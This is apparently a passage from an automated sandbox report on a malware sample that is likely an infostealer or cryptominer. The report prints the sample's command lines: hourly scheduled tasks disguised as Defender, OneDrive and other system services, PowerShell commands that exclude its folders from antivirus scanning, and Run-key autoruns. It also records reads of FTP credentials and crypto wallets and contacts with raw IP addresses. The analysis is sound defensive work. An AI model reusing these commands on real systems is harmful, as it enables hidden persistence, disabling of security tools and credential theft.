RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: {AC76BA86-7AD7-FFFF-7B44-AC0F074E4100} base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}	1

Terminates another process (23 events)

Time & API	Arguments	Status	Return
NtTerminateProcess Aug. 13, 2022, 8:36 p.m.	status_code: 0xffffffff process_identifier: 3860 process_handle: 0x000002e0		0
NtTerminateProcess Aug. 13, 2022, 8:36 p.m.	status_code: 0xffffffff process_identifier: 3792 process_handle: 0x00000280		0
NtTerminateProcess Aug. 13, 2022, 8:36 p.m.	status_code: 0xffffffff process_identifier: 3792 process_handle: 0x00000280	1	0
NtTerminateProcess Aug. 13, 2022, 8:36 p.m.	status_code: 0xffffffff process_identifier: 2312 process_handle: 0x00000280		0
NtTerminateProcess Aug. 13, 2022, 8:36 p.m.	status_code: 0xffffffff process_identifier: 2312 process_handle: 0x00000280	1	0
NtTerminateProcess Aug. 13, 2022, 8:36 p.m.	status_code: 0xffffffff process_identifier: 3544 process_handle: 0x00000280		0
NtTerminateProcess Aug. 13, 2022, 8:36 p.m.	status_code: 0xffffffff process_identifier: 3544 process_handle: 0x00000280	1	0
NtTerminateProcess Aug. 13, 2022, 8:36 p.m.	status_code: 0xffffffff process_identifier: 3992 process_handle: 0x00000280		0
NtTerminateProcess Aug. 13, 2022, 8:36 p.m.	status_code: 0xffffffff process_identifier: 3992 process_handle: 0x00000280		3221225738
NtTerminateProcess Aug. 13, 2022, 8:36 p.m.	status_code: 0xffffffff process_identifier: 1512 process_handle: 0x00000280		0
NtTerminateProcess Aug. 13, 2022, 8:36 p.m.	status_code: 0xffffffff process_identifier: 1512 process_handle: 0x00000280		3221225738
NtTerminateProcess Aug. 13, 2022, 8:36 p.m.	status_code: 0xffffffff process_identifier: 244 process_handle: 0x00000280		0
NtTerminateProcess Aug. 13, 2022, 8:36 p.m.	status_code: 0xffffffff process_identifier: 244 process_handle: 0x00000280		3221225738
NtTerminateProcess Aug. 13, 2022, 8:36 p.m.	status_code: 0xffffffff process_identifier: 3344 process_handle: 0x000002f8		0
NtTerminateProcess Aug. 13, 2022, 8:36 p.m.	status_code: 0xffffffff process_identifier: 3344 process_handle: 0x000002f8	1	0
NtTerminateProcess Aug. 13, 2022, 8:36 p.m.	status_code: 0xffffffff process_identifier: 2608 process_handle: 0x000002f8		0
NtTerminateProcess Aug. 13, 2022, 8:36 p.m.	status_code: 0xffffffff process_identifier: 2608 process_handle: 0x000002f8	1	0
NtTerminateProcess Aug. 13, 2022, 8:36 p.m.	status_code: 0xffffffff process_identifier: 2908 process_handle: 0x000002f8		0
NtTerminateProcess Aug. 13, 2022, 8:36 p.m.	status_code: 0xffffffff process_identifier: 2908 process_handle: 0x000002f8		3221225738
NtTerminateProcess Aug. 13, 2022, 8:37 p.m.	status_code: 0xffffffff process_identifier: 2064 process_handle: 0x00000510		0
NtTerminateProcess Aug. 13, 2022, 8:37 p.m.	status_code: 0xffffffff process_identifier: 2064 process_handle: 0x00000510	1	0
NtTerminateProcess Aug. 13, 2022, 8:37 p.m.	status_code: 0xffffffff process_identifier: 1144 process_handle: 0x00000510		0
NtTerminateProcess Aug. 13, 2022, 8:37 p.m.	status_code: 0xffffffff process_identifier: 1144 process_handle: 0x00000510	1	0

Uses Windows utilities for basic Windows functionality (31 events)

cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /C chcp 1251 & powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk579" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk406" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	chcp 1251
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2480 CREDAT:145409
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2480 CREDAT:145410
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk579" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk1481" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk7066" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk1481" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk406" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk7066" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2480 CREDAT:210945
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"

Executes one or more WMI queries which can be used to identify virtual machines (1 event)

wmi	SELECT * FROM Win32_Processor

One or more of the buffers contains an embedded PE file (1 event)

buffer

Buffer with sha1: 8a4089a71223de0325f404aea31ab0e2f9a015e1

Communicates with host for which no DNS query was performed (7 events)

host	103.89.90.61
host	117.18.232.200
host	176.113.115.146
host	193.56.146.177
host	195.54.170.157
host	45.159.248.173
host	62.204.41.144

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation Aug. 13, 2022, 8:13 p.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

A process attempted to delay the analysis task. (2 events)

description	dllhost.exe tried to sleep 5456445 seconds, actually delayed analysis time by 5456445 seconds
description	MinecraftForge.exe tried to sleep 2728193 seconds, actually delayed analysis time by 2728193 seconds

Checks the CPU name from registry, possibly for anti-virtualization (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

Installs itself for autorun at Windows startup (33 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dllhost	reg_value	C:\ProgramData\Dllhost\dllhost.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealthSystray	reg_value	C:\Windows\System32\SecurityHealthSystray.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefender	reg_value	C:\Program Files\Windows Defender\MpCmdRun.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Cortana	reg_value	C:\Program Files\WindowsApps\Microsoft.x64__8wekyb3gfdfdgd8bbwe\Cortana.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE	reg_value	C:\Windows\System32\wbem\WmiPrvSE.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\AntiMalwareServiceExecutable	reg_value	C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MsMpEng.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeUpd	reg_value	C:\Program Files\WindowsApps\Microsoft.x64__8wekyb3gfdfdgd8bbwe/file.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\OneDriveService	reg_value	C:\Program Files\WindowsApps\Microsoft.x64__8wekyb3gfdfdgd8bbwe/file.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\NvStray	reg_value	C:\Program Files\WindowsApps\Microsoft.x64__8wekyb3gfdfdgd8bbwe / file.exe
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk579" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk406" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk579" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk1481" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk7066" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk1481" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk406" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk7066" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"

Attempts to access Bitcoin/ALTCoin wallets (1 event)

file	C:\Users\test22\AppData\Roaming\Electrum\wallets\

Created a service where a service was also not started (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateServiceW Aug. 13, 2022, 8:37 p.m.	service_start_name: start_type: 3 password: display_name: WinRing0_1_2_0 filepath: C:\ProgramData\Dllhost\WinRing0x64.sys service_name: WinRing0_1_2_0 filepath_r: C:\ProgramData\Dllhost\WinRing0x64.sys desired_access: 983551 service_handle: 0x00000000003aa760 error_control: 1 service_type: 1 service_manager_handle: 0x00000000003aa700	1	3843936	0

Harvests credentials from local FTP client softwares (3 events)

file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
registry	HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Executes one or more WMI queries (7 events)

wmi	SELECT * FROM AntivirusProduct
wmi	SELECT * FROM Win32_VideoController
wmi	SELECT * FROM Win32_OperatingSystem
wmi	SELECT * FROM Win32_Process Where SessionId='1'
wmi	SELECT * FROM AntiSpyWareProduct
wmi	SELECT * FROM FirewallProduct
wmi	SELECT * FROM Win32_Processor

Collects information about installed applications (50 out of 195 events)

Time & API	Arguments	Status
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: NewProduct 1.00 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\NewProduct 1.00\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Excel MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft PowerPoint MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Publisher MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Outlook MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Word MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - English regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Outils de vérification linguistique 2013 de Microsoft Office - Français regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - Español regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft InfoPath MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft DCF MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft OneNote MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Groove MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM UX MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Lync MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Acrobat Reader DC MUI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\DisplayName	1
RegQueryValueExW Aug. 13, 2022, 8:14 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1
